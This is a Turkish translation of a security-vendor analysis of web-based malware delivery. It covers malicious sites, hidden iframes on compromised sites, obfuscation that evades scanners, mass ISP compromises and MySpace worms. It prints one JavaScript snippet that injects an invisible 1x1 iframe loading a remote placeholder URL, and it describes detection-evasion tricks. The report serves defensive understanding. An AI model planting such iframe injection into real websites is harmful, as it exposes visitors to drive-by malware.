---> Modern Web Saldırıları
3.Zararlı Siteler
Bir çok farklı tipte site malware içerir. Heckerlar bedava web sağlayıcı servislerde yeni siteler oluşturarak, bu siteleri kurbana ulaşmak için araç olarak kullanırlar. Zararlı kodlar (öncelikli olarak JavaScript) kullanılarak kurbana zarar veren bir çok yol mevcut. Bu kodlar ziyaretçinin tarayıcısını sayfanın doğru bir şekilde yüklendiğine inandırdıktan sonra tarayıcının açığını ararlar. Daha sonra uygulanabilecek açıklar listelenerek açık bulununcaya dek tarayıcı üzerinde denenir. Basit aldatıcı kod Şekil 7’de gösterilmiştir. Hackerlar yeni açıklar bulunur bulunmaz bunları saldırılarına eklerler (Örnek olarak yeni Yahoo! webcam ActiveX açığı ). Başarılı bir şekilde açıklar için exploit oluşturmakta kullanılabilecek yayınlanmış teknik dokümanların oranı ile çalışan exploit kodları arasında doğru orantı mevcuttur. Ek olarak bir ActiveX açığı üzerinde oluşturulan kod benzer bir ActiveX açığında başarıyla kullanılabilir.
[FONT=times new roman, times, serif]Şekil 7: Modern web saldırısında kullanılan tipik aldatıcı kod.[/FONT]
Faydalanılan Siteler
Kullanıcılar ve kullandıkları web servisleri arasında bir güven ilişkisi vardır. Rutin olarak bu sitelere bağlanıp online haritalar üzerinden haber okur, hava tahminlerini incelerler, dolayısıyla tarayıcılarını bu sitelerin içeriklerine izin vermelerini sağlarlar. Doğrusu kullanıcılar güvenilen site listelerini oluşturmaları için teşvik edilirler, böylece görüntülenen sitenin tarayıcı ayarlarından güvenilen site olarak ayalanması sağlanır. Bu yolla tarayıcılar görüntülenen sitenin ihtiyaç duyabileceği ActiveX, Java gibi kodlamaların çalışmasına olanak sağlar. Uygulanan konsept güvenilir olmayan sitelerin izin verilen içeriği üzerinde daha katı bir kontrol uygulanmasını esas alır. Buna rağmen son zamanlarda tehlikeli sitelerin seviyesinde keskin bir artış saptandı . Neden? Hackerlar bu işi sadece ün için yapmıyorlar , . Bu tip zararlı yazılımların barındırıldığı bir siteler dokümanın başında bahsedilen adımları tamamlayan gizli bir mekanizmayı sağlar: tehtidin yayılması ve uygulama. Üstelik bu siteler geniş ve güvenen bir kullanıcı kitlesine sahipse kurbanların sayısı büyük oranlara ulaşabilir. 2007 Super Bowl ödüllerinden kısa süre önce Miami Dolphins sitesinin hacklenmesi saldırılarda faydalanılabilecek sitelerin önemine dikkat çekti .
HTML extra içerik yüklenmesi için çok rahat yollara sahiptir. En çok kullanılan yöntemlerden biri <IFRAME> tagıdır , içeriği sayfaya gizlice entegre eder. Bu tag bir çok web sitesinde uygulanmaktadır. Malware yazarı için bu yöntem gücenilen web adresleri üzerinden kullanıcının müdahalesine veya sosyal mühendislik uygulamalarına ihtiyaç duyulmaksızın zararlı içeriğin çalıştırılması için çok uygundur. 2007’nin son 6 aylık istatistiklerine göre web tabanlı malware uygulamalarının yaklaşık %50’si iframe yöntemini kullanıyor . İçeriğin yüklendiği iframein sayfadaki görüntüsünü ayarlamak için yükseklik ve genişlik özellikleri sıkça kullanılır. Kullanıcının zararlı iframei görmemesi için genellikle genişlik/yükseklik oranları çok küçük ayarlanır (0-10 piksel). Bir sayfada birden fazla iframeler mevcut ise, ufak ifremeler ufak kutucuklara sebep olur. Zararlı iframelerin bu özelliklere sahip olduğu bilinmesine rağmen proaktif tespit sistemleri bunları sıradan olarak görür, çünkü bir çok normak web sitesi çok benzer özelliklere sahip iframeler kullanmaktadır. iframe boyutu tespit için kullanılabilir fakat içeriğide (kaynak kodu) çok iyi analiz edilmelidir. İlginçtir, bir çok saldırı türü küçük boyutlardan çok büyük boyutlu iframelere geçiş yapmıştır (örn: 1500x1500 piksel), muhtemelen ufak boyutlardaki iframeleri potansiyel tehlike olarak gören savunma teknolojilerinin şüphelerini çekmemeyi amaçlıyorlar.
[FONT=times new roman, times, serif]Şekil 8: Birçok kez kullanılmış bir sitenin ekran görüntüsü. Çok ufak kutucuklar görünüyor (23 kutunun her biri eklenmiş zararlı iframeler)[/FONT]
Benzer bir durumda iframe içerisindeki zararlı kodun sayfa görüntülendiğinde çalıştırılmasıdır. Bunun neticesinde aynı sonuç elde edilir –sayfa görüntülendiğinde uzak sunucudan zararlı içerik çekilerek yüklenir- bu tip ataklar koruma yöntemlerine karşı farklı bir yöntem izlemektedir. Faydalanılan sitelerin tespit edilmesinde iframein tespitinden ziyade içerdiği metnin tespiti gereklidir. document.write(’<iframe ...>’)’in sağladığı çeşitli yollarla JavaScript kullanılarak proaktif tespit sistemleri aldatılabilir (bkz. Şekil 9).
[FONT=times new roman, times, serif]Şekil 9: Faydalanılan web sitesi görüntülendiğinde zararlı iframe sayfaya eklenir. (üst kısım:sayfadaki iframe tagı , alt kısım: saldırı sırasında zararlı kod sayfaya ekleniyor).[/FONT]
Pintadd olarak bilinen yeni bir saldırı aynı şekilde uzak sunucudan zararlı içeriği çekmek için iframe yöntemini kullanır, fakat ufak bir hilesi vardır. iframe objesini ve niteliklerini oluşturmadan önce basit document.write() yerine createElement() metodu nu kullanır ve sayfaya eklemek için appendChild() metodu nundan faydalanır:
var url=’http://domain/path/index.php’;
var ifr=document.createElement(’iframe’);
ifr.setAttribute(’src’,url);
ifr.frameBorder=0;
ifr.width=1;
ifr.height=1;
document.bOdy.appendChild(ifr)
Kurban açısından iframe tagının direk eklenmesiyle bu yöntem sonuç olarak tamamen aynıdır. Günvelik yazılımları içinse üstesinden gelinmesi gereken başka bir problemdir. SophosLabs tarafından tespit edilen neredeyse tüm faydalanılan siteler uzak sunucuya bu şekilde bağlantılar içerir. Bir sitenin güvenliği aşıldığı andan itibaren, bir saldırı için gerekebilecek tüm bileşenler o sitede barındırılabilir. Sayfa zararlı kodun çalıştırılması için modifiye edilip, yüklenecek olan zararlı yazılım aynı serverda barındırılabilir. Fakat bu yönteme pek rastlanmaz, bunun iki ana nedeni vardır. İlk olarak faydalanılan siteleri tek bir yere yönlendirmek merkezi bir kontrol sistemi sağlar. İkinci olarak, ufak bir iframe kodu eklemek yerine büyük scriptler binary dosyalarını yüklemek yakalanma riski açısından çok daha dikkat çekicidir. Bir sitenin bir çok kez kullanıldığı içerdiği bazı işaretlerden anlaşılabilir (Şekil 8), sayfa kaynağıda bazı işaretler taşır. Çoklu iframe tagları veya zararlı scriptler kullanıldığı bazı durumlarda karakteristik işaretçilerle (HTML yorumlayıcı) eklenen kodun hemen başında ve sonunda karşılaşılır
[FONT=times new roman, times, serif]Şekil 10: Her blok arasında (<!-- ~ -- >) kullanıldığı görünüyor.[/FONT]
Büyük sitelerden faydalanılması önemli bir ilgi oluşturabilir. Buna rağmen gözlemlerimize göre faydalanılan siteler genellikle küçük trafiğe sahipler. Ayrı ayrı az bir etki gösterselerde kümülatif olarak düşünüldüğünde azımsanmayacak bir etkiye sahipler. Bir diğer belirgin problem de ağ gelişiminin dışarıdan destek almasıdır. Öncelikle site oluşturulur, faaliyete geçirilir, fakat bunun sonrasında sitenin zararlı bir yazılım tarafından kullanılması durumunda herhangi bir şey yapamazlar. Sayfaların eklenen script veya iframelerden basit bir şekilde arındırılması hususunda dahi yetersizlerdir. Malwareler tarafından kullanılan sitelerin yöneticileriyle temasa geçip sitelerinin nasıl ve ne amaçla kullanıldıklarını aktarmak çok önemlidir. Fakat site yöneticileriyle temasa geçme işlemi bazı büyük siteler dahil başarısızlıkla sonuçlanıyor.
Hackerlar servis sağlayıcıda bulunan makine üzerindeki tüm sitelere tek bir siteye saldırarak ulaşabilmekteler . Bu yılın başlarında SophosLabs, EncIfr tarafından kullanılan onlarca serverın bulunduğu bir Polonya ISP tespit etti. Sayıları 13.000’in üzerine çıkan siteler yem olarak kullanılıyordu. Her bir sayfaya JS/EncIfr-A adındaki zararlı kod eklenmişti. Bu olay bir saldırının etki alanı ve önemini belirlemek için neden sadece etkilenen sitelerin tespit edilmesinin yeterli olmadığı anlamak açısından iyi bir örnek.
Bazı saldırıların bir dizi siteyi kullanmak yerine popular bir web sitesini kullanması bu durumun ayrıca ele alınmasının gerekliliğine işaret ediyor. Yakın geçmişte MySpace sosyal ağına yapılan iki saldırı bunun iyi iki örneği. Ofigel QuickTime görüntülerinin bir özelliğinden (gömülü JavaScript desteği) yararlanarak bir MySpace solucanı ortaya çıkardı . Kullanıcılar etkilenmiş bir profili görüntülediklerinde görüntü yürütülerek uzak servisten zararlı kodun çekilmesi sağlanmıştı. Bu kod MySpace’te bulunan bir XSS açığından faydalanarak kurbanın profiline etki ediyordu (QuickTime görüntüsü ekleyerek). SpaceStalk olarak adlandırılan daha sonraki bir saldırıda aynı yöntemi kullandı , . Bu tür odaklanmış saldırı tipleri kurbana zarar vermek için popüler web sitelerinin açıklarından faydalanır. Sitelerden faydalanmak amacıyla uygulanan tekniklerden (örn: XSS) kurbanın kendini koruması bir hayli zordur. Malware saldırılarından korunmanın en etkili yollarından biri URL sınıflandırma teknolojilerini kullanmaktır (bkz. Bölüm 4.)
Etkilenmiş Web Serverları
HTML ve script dosyalarını (PHP, ASP vb.) değiştirebilen birçok virus mevcut. Fujacks ve Pardona türevi dosyaları değiştirerek iframe tagı ekleyebilen virüslerdendir. Her iki tür de Windows platformu için yazılmış olup, web servislerinin bir kısmı içintehlikelidir. Web servislerinin %30’unun Microsoft IIS tabanlı olmasına rağmen bu türler kullanıcılar için hala büyük bir tehdit oluşturuyor. SophosLabs 2007 yılında bu virüslerin zarar verdiği geniş bir site listesi tespit etti. Etkilenmiş servislerde gözlemlenen ilginç bir şey ise diğer dosya tiplerinin (.GIF gibi) iframelere eklenmesi. Bu tip dosyalar zararsızdır (HTML iframe tagını yorumlayacak herhangi bir şekil uygulamasından haberdar değilim).